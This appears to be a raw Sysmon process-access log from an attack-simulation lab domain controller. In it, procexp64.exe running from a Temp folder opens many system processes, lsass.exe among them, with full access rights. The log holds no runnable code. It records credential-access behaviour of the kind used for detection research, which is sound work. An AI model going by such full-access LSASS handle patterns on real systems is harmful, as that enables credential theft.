15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792751Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792750Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792749Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792748Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792747Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792746Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792745Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792744Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792743Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792742Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792741Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792740Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792739Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792738Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792737Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792736Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792735Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792734Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792733Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792732Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792731Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792730Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792729Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792728Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792857Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792856Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792855Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792854Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792853Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792852Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792851Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792850Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792849Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792848Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792847Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792846Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792845Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:08.954{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files 